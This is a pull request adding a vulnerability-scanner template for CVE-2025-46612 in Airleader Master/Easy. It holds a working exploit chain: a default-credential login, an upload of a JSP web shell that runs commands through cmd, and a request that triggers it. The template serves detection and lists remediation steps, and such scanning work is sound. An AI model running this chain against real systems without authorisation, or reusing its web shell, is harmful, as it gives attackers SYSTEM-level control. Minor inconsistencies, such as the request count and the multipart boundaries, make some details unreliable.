### PR TITLE
Add CVE-2025-46612 - Airleader Master/Easy Default Creds to RCE via File Upload

### DIFF
--- a/http/cves/2025/CVE-2025-46612.yaml
+++ b/http/cves/2025/CVE-2025-46612.yaml
@@ -1,0 +1,76 @@
+id: CVE-2025-46612
+
+info:
+  name: Airleader Master/Easy < 6.36 - Default Credentials to Remote Code Execution via File Upload
+  author: ohmygod20260203
+  severity: critical
+  description: |
+    Airleader Master and Airleader Easy before version 6.36 are vulnerable to unrestricted
+    file upload leading to remote code execution. The web interface is configured with weak
+    default credentials (airleader:airleader for Master). The Panel Designer dashboard at
+    wizard/workspace.jsp allows unrestricted file upload, which can be abused to upload a
+    JSP web shell to the web server. The uploaded file is accessible at
+    wizard/images/panel/<filename>.jsp. The web server runs with highest privileges (SYSTEM)
+    by default, giving the attacker complete control over the system.
+  impact: |
+    Attackers can use default credentials to authenticate and upload a malicious JSP web shell
+    via the Panel Designer, achieving remote code execution with NT AUTHORITY\SYSTEM privileges.
+  remediation: |
+    Update Airleader Master/Easy to version 6.36 or later. Change default credentials immediately.
+    Restrict network access to the management interface.
+  reference:
+    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-036.txt
+    - https://www.airleader.de/produkte
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-46612
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 4
+    product: airleader_master
+    vendor: airleader
+  tags: cve,cve2025,airleader,rce,fileupload,default-login,intrusive
+
+variables:
+  shell_name: "{{to_lower(rand_text_alphanumeric(8))}}"
+  shell_marker: "{{rand_text_alphanumeric(32)}}"
+
+http:
+  - raw:
+      - |
+        POST /admin/login.jsp?show=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=airleader&password=airleader
+
+      - |
+        POST /wizard/workspace.jsp?admin=true HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rand_text_alphanumeric(16)}}
+
+        ------WebKitFormBoundary{{rand_text_alphanumeric(16)}}
+        Content-Disposition: form-data; name="file"; filename="{{shell_name}}.jsp"
+        Content-Type: application/octet-stream
+
+        <%@ page import="java.io.*" %><%if("{{shell_marker}}".equals(request.getParameter("v"))){Process p=Runtime.getRuntime().exec(new String[]{"cmd","/c","echo {{shell_marker}}"});BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String l;while((l=br.readLine())!=null){out.println(l);}}%>
+        ------WebKitFormBoundary{{rand_text_alphanumeric(16)}}--
+
+      - |
+        GET /wizard/images/panel/{{shell_name}}.jsp?v={{shell_marker}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "{{shell_marker}}"
+
+      - type: status
+        status:
+          - 200
+        part: header_3


### PR DESCRIPTION
## CVE-2025-46612 — Airleader Master/Easy File Upload RCE

### Description
Airleader Master and Easy before v6.36 have:
1. Default credentials (`airleader:airleader`)
2. Unrestricted file upload via Panel Designer (`/wizard/workspace.jsp`)
3. Uploaded JSP files accessible at `/wizard/images/panel/<filename>.jsp`
4. Web server runs as NT AUTHORITY\SYSTEM

### Impact
Complete system compromise via default credentials → JSP web shell upload → SYSTEM-level RCE.

### Template Details
- **Severity:** Critical (CVSS 9.8)
- **Requests:** 3 (login → upload JSP shell → verify execution)
- **Verification:** Shell marker string in response body + HTTP 200
- **Cookie reuse:** Yes (session maintained across requests)
- **Intrusive:** Yes (uploads a test file)

### References
- [SySS Advisory SYSS-2025-036](https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-036.txt)
- [Airleader Products](https://www.airleader.de/produkte)